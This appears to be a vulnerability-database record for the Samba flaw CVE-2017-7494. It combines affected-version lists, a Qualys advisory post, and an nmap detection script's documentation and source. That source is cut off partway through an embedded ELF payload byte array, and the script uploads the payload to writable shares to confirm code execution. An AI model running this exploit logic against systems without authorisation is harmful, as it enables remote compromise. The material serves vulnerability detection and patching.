"cpe:/a:samba:samba:4.6.5", "cpe:/a:samba:samba:4.1.23", "cpe:/a:samba:samba:4.0.14", "cpe:/a:samba:samba:4.1.7", "cpe:/a:samba:samba:4.0.26", "cpe:/a:samba:samba:4.0.1", "cpe:/a:samba:samba:4.1.22", "cpe:/a:samba:samba:4.2.0", "cpe:/a:samba:samba:3.5.14", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:4.5.3", "cpe:/a:samba:samba:3.6.17", "cpe:/a:samba:samba:4.2.10", "cpe:/a:samba:samba:4.2.7", "cpe:/a:samba:samba:3.6.20", "cpe:/a:samba:samba:3.5.20", "cpe:/a:samba:samba:4.3.9", "cpe:/a:samba:samba:4.4.4", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.6.8", "cpe:/a:samba:samba:4.0.5", "cpe:/a:samba:samba:4.2.9", "cpe:/a:samba:samba:4.0.13", "cpe:/a:samba:samba:4.0.21", "cpe:/a:samba:samba:3.6.6", "cpe:/a:samba:samba:4.4.6", "cpe:/a:samba:samba:4.6.2", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:4.1.9", "cpe:/a:samba:samba:3.6.16", "cpe:/a:samba:samba:4.4.1", "cpe:/a:samba:samba:4.1.18", "cpe:/a:samba:samba:3.6.22", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.6.4", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.6.15", "cpe:/a:samba:samba:4.1.16", "cpe:/a:samba:samba:3.6.23", "cpe:/a:samba:samba:3.5.16", "cpe:/a:samba:samba:4.3.8", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:4.4.9", "cpe:/a:samba:samba:4.1.14", "cpe:/a:samba:samba:4.3.6", "cpe:/a:samba:samba:4.5.1", "cpe:/a:samba:samba:4.4.0", "cpe:/a:samba:samba:4.2.1", "cpe:/a:samba:samba:4.2.13", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:4.6.0", "cpe:/a:samba:samba:4.3.5", "cpe:/a:samba:samba:4.1.11", "cpe:/a:samba:samba:4.4.2", "cpe:/a:samba:samba:4.0.20", "cpe:/a:samba:samba:4.1.15", "cpe:/a:samba:samba:4.2.3", "cpe:/a:samba:samba:4.3.10", "cpe:/a:samba:samba:4.0.0", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:4.3.2", "cpe:/a:samba:samba:3.6.5", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:4.5.8", "cpe:/a:samba:samba:4.3.0", "cpe:/a:samba:samba:4.0.17", "cpe:/a:samba:samba:4.0.18", "cpe:/a:samba:samba:3.5.18", "cpe:/a:samba:samba:4.1.3", "cpe:/a:samba:samba:4.4.10", "cpe:/a:samba:samba:4.1.2"], "id": "CVE-2017-7494", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.19:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2017-06-10T11:14:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "On Wednesday, the Samba Team patched a [vulnerability](<https://www.samba.org/samba/security/CVE-2017-7494.html>) that exists in all versions of Samba including and after version 3.5.0. Exploitation of this vulnerability could result in remote code execution on the affected host.\n\nSamba is used to provide SMB and CIFS services for Linux systems, and is pervasive in both enterprise and consumer products. While the Samba Team is providing patches for the latest versions (4.4.x and higher), some Linux vendors, such as [RedHat](<https://access.redhat.com/security/cve/cve-2017-7494>) and [Ubuntu](<https://www.ubuntu.com/usn/usn-3296-1/>), are providing patches for older versions of Samba if they are used in a supported version of the OS. The Samba Team may also release [patches for older versions of Samba](<http://samba.org/samba/patches/>).\n\n### Background\n\n\n\nQuestions have been raised on whether this vulnerability could pose the same risk as WannaCry, and this vulnerability does bear some similarities, but there are some key differences. Similar to the vulnerability exploited by WannaCry, this exploit targets SMB, albeit a different implementation of the protocol. It also carries the threat of being \"wormable,\" i.e. malware can leverage it to spread automatically from system to system.\n\nHowever, this vulnerability remains much more difficult to exploit, because it requires not only outdated software but also a specific configuration, such as anonymous write access to a share. Still, examples like this Samba vulnerability only continue to reinforce the ongoing need for continuous security visibility to prioritize patching and system configuration updates and for full data backups of critical files to ensure business resiliency.\n\n### Detecting CVE-2017-7494\n\nQualys has provided several QIDs for detecting this vulnerability using [Qualys Vulnerability Management](<https://www.qualys.com/suite/vulnerability-management/>), and will continue to add details as vendors release additional patches.\n\n38671 Samba Writable Share Remote Code Execution Vulnerability \n170002 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1391-1) \n170003 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1392-1) \n170004 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1393-1) \n196791 Ubuntu Security Notification for Samba Vulnerability (USN-3296-1) \n236359 Red Hat Update for samba (RHSA-2017-1270) \n236360 Red Hat Update for samba4 (RHSA-2017-1271) \n236361 Red Hat Update for samba3x (RHSA-2017-1272) \n157455 Oracle Enterprise Linux Security Update for samba (ELSA-2017-1270) \n157456 Oracle Enterprise Linux Security Update for samba4 (ELSA-2017-1271) \n176040 Debian Security Update for samba (DSA 3860-1)\n\nQID 38671 offers remote (unauthenticated) detection of the vulnerability by identifying the underlying samba version. The other vendor-specific QIDs require authentication and will identify the vendor-specific patch needed for remediation.\n\n### Workarounds\n\nAccording to the Samba security bulletin, there is a workaround available. You can add the parameter:\n\nnt pipe support = no\n\nto the [global] section of your smb.conf and restart smbd. Please note that the Samba Team has also advised: \"This prevents clients from accessing any named pipe endpoints. Note this can disable some expected functionality for Windows clients.\" As with any workarounds, this should be fully tested in your environment before a large-scale deployment is performed.\n\n### Get Started Now\n\nTo start detecting and protecting against critical vulnerabilities, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>). All features described in this article are available in the trial.", "modified": "2017-05-26T20:32:57", "published": "2017-05-26T20:32:57", "id": "QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA", "href": "https://blog.qualys.com/securitylabs/2017/05/26/samba-vulnerability-cve-2017-7494", "type": "qualysblog", "title": "Samba Vulnerability CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-05-30T17:05:48", "description": "Checks if target machines are vulnerable to the arbitrary shared library load vulnerability CVE-2017-7494. \n\nUnpatched versions of Samba from 3.5.0 to 4.4.13, and versions prior to 4.5.10 and 4.6.4 are affected by a vulnerability that allows remote code execution, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it. \n\nThe script does not scan the version numbers by default as the patches released for the mainstream Linux distributions do not change the version numbers. \n\nThe script checks the preconditions for the exploit to happen: \n\n1) If the argument check-version is applied, the script will ONLY check services running potentially vulnerable versions of Samba, and run the exploit against those services. This is useful if you wish to scan a group of hosts quickly for the vulnerability based on the version number. However, because of their version number, some patched versions may still show up as likely vulnerable. Here, we use smb.get_os(host) to do versioning of the Samba version and compare it to see if it is a known vulnerable version of Samba. Note that this check is not conclusive: See 2,3,4 \n\n2) Whether there exists writable shares for the execution of the script. We must be able to write to a file to the share for the exploit to take place. We hence enumerate the shares using smb.share_find_writable(host) which returns the main_name, main_path and a list of writable shares. \n\n3) Whether the workaround (disabling of named pipes) was applied. When \"nt pipe support = no\" is configured on the host, the service would not be exploitable. Hence, we check whether this is configured on the host using smb.share_get_details(host, 'IPC$'). The error returned would be \"NT_STATUS_ACCESS_DENIED\" if the workaround is applied. \n\n4) Whether we can invoke the payloads from the shares. Using payloads from Metasploit, we upload the library files to the writable share obtained from 2). We then make a named pipe request using NT_CREATE_ANDX_REQUEST to the actual local filepath and if the payload executes, the status return will be false. Note that only Linux_x86 and Linux_x64 payloads are tested in this script. \n\nThis script is based on the metasploit module written by hdm. \n\nReferences: \n\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb\n * https://www.samba.org/samba/security/CVE-2017-7494.html\n * http://blog.nsfocus.net/samba-remote-code-execution-vulnerability-analysis/\n\n## Script Arguments \n\n#### smb-vuln-cve-2017-7494.check-version \n\nCheck only the version numbers the target's Samba service. Default: false\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap --script smb-vuln-cve-2017-7494 -p 445 <target>\n\n * nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 445/tcp open microsoft-ds\n MAC Address: 00:0C:29:16:04:53 (VMware)\n \n | smb-vuln-cve-2017-7494:\n | VULNERABLE:\n | SAMBA Remote Code Execution from Writable Share\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-7494\n | Risk factor: HIGH CVSSv3: 7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n | All versions of Samba from 3.5.0 onwards are vulnerable to a remote\n | code execution vulnerability, allowing a malicious client to upload a\n | shared library to a writable share, and then cause the server to load\n | and execute it.\n |\n | Disclosure date: 2017-05-24\n | Check results:\n | Samba Version: 4.3.9-Ubuntu\n | Writable share found.\n | Name: \\\\192.168.15.131\\test\n | Exploitation of CVE-2017-7494 succeeded!\n | Extra information:\n | All writable shares:\n | Name: \\\\192.168.15.131\\test\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n |_ https://www.samba.org/samba/security/CVE-2017-7494.html\n \n\n## Requires \n\n * smb\n * string\n * vulns\n * stdnse\n * table\n * nmap\n\n* * *\n", "edition": 5, "published": "2017-06-10T03:29:33", "title": "smb-vuln-cve-2017-7494 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2018-03-26T14:59:41", "href": "https://nmap.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html", "id": "NMAP:SMB-VULN-CVE-2017-7494.NSE", "sourceData": "local smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal nmap = require \"nmap\"\n\ndescription = [[\nChecks if target machines are vulnerable to the arbitrary shared library load\nvulnerability CVE-2017-7494.\n\nUnpatched versions of Samba from 3.5.0 to 4.4.13, and versions prior to\n4.5.10 and 4.6.4 are affected by a vulnerability that allows remote code\nexecution, allowing a malicious client to upload a shared library to a writable\nshare, and then cause the server to load and execute it.\n\nThe script does not scan the version numbers by default as the patches released\nfor the mainstream Linux distributions do not change the version numbers.\n\nThe script checks the preconditions for the exploit to happen:\n\n1) If the argument check-version is applied, the script will ONLY check\n services running potentially vulnerable versions of Samba, and run the\n exploit against those services. This is useful if you wish to scan a\n group of hosts quickly for the vulnerability based on the version number.\n However, because of their version number, some patched versions may still\n show up as likely vulnerable. Here, we use smb.get_os(host) to do\n versioning of the Samba version and compare it to see if it is a known\n vulnerable version of Samba. Note that this check is not conclusive:\n See 2,3,4\n\n2) Whether there exists writable shares for the execution of the script.\n We must be able to write to a file to the share for the exploit to\n take place. We hence enumerate the shares using\n smb.share_find_writable(host) which returns the main_name, main_path\n and a list of writable shares.\n\n3) Whether the workaround (disabling of named pipes) was applied.\n When \"nt pipe support = no\" is configured on the host, the service\n would not be exploitable. Hence, we check whether this is configured\n on the host using smb.share_get_details(host, 'IPC$'). The error\n returned would be \"NT_STATUS_ACCESS_DENIED\" if the workaround is\n applied.\n\n4) Whether we can invoke the payloads from the shares.\n Using payloads from Metasploit, we upload the library files to\n the writable share obtained from 2). We then make a named pipe request\n using NT_CREATE_ANDX_REQUEST to the actual local filepath and if the\n payload executes, the status return will be false. Note that only\n Linux_x86 and Linux_x64 payloads are tested in this script.\n\nThis script is based on the metasploit module written by hdm.\n\nReferences:\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb\n* https://www.samba.org/samba/security/CVE-2017-7494.html\n* http://blog.nsfocus.net/samba-remote-code-execution-vulnerability-analysis/\n]]\n\n---\n-- @usage nmap --script smb-vuln-cve-2017-7494 -p 445 <target>\n-- @usage nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <target>\n-- @output\n-- PORT STATE SERVICE\n-- 445/tcp open microsoft-ds\n-- MAC Address: 00:0C:29:16:04:53 (VMware)\n--\n-- | smb-vuln-cve-2017-7494:\n-- | VULNERABLE:\n-- | SAMBA Remote Code Execution from Writable Share\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-7494\n-- | Risk factor: HIGH CVSSv3: 7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n-- | All versions of Samba from 3.5.0 onwards are vulnerable to a remote\n-- | code execution vulnerability, allowing a malicious client to upload a\n-- | shared library to a writable share, and then cause the server to load\n-- | and execute it.\n-- |\n-- | Disclosure date: 2017-05-24\n-- | Check results:\n-- | Samba Version: 4.3.9-Ubuntu\n-- | Writable share found.\n-- | Name: \\\\192.168.15.131\\test\n-- | Exploitation of CVE-2017-7494 succeeded!\n-- | Extra information:\n-- | All writable shares:\n-- | Name: \\\\192.168.15.131\\test\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n-- |_ https://www.samba.org/samba/security/CVE-2017-7494.html\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-7494\">\n-- <elem key=\"title\">SAMBA Remote Code Execution from Writable Share</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-7494</elem>\n-- </table>\n-- <table key=\"scores\">\n-- <elem key=\"CVSSv3\">7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>All versions of Samba from 3.5.0 onwards are vulnerable to a remote&#xa;code execution vulnerability, allowing a malicious client to upload a&#xa;shared library to a writable share, and then cause the server to load&#xa;and execute it.&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">24</elem>\n-- <elem key=\"month\">05</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-05-24</elem>\n-- <table key=\"check_results\">\n-- <elem>Samba Version: 4.3.9-Ubuntu</elem>\n-- <elem>Writable share found. &#xa; Name: \\\\192.168.15.131\\test</elem>\n-- <elem>Exploitation of CVE-2017-7494 succeeded!</elem>\n-- </table>\n-- <table key=\"extra_info\">\n-- <elem>All writable shares:</elem>\n-- <elem> Name: \\\\192.168.15.131\\test</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://www.samba.org/samba/security/CVE-2017-7494.html</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494</elem>\n-- </table>\n-- </table>\n-- @args smb-vuln-cve-2017-7494.check-version Check only the version numbers the target's Samba service. Default: false\n--\n---\n\nauthor = \"Wong Wai Tuck\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\",\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\ndependencies = {\"smb-os-discovery\", \"smb-brute\"}\n\n--linux/x86/exec (CMD=id)\nlocal PAYLOAD_X86 = {\n0x7F, 0x45, 0x4C, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00,\n0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,\n0x02, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x1C, 0x01, 0x00, 0x00, 0x42, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00,\n0xC4, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0xC4, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00,\n0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 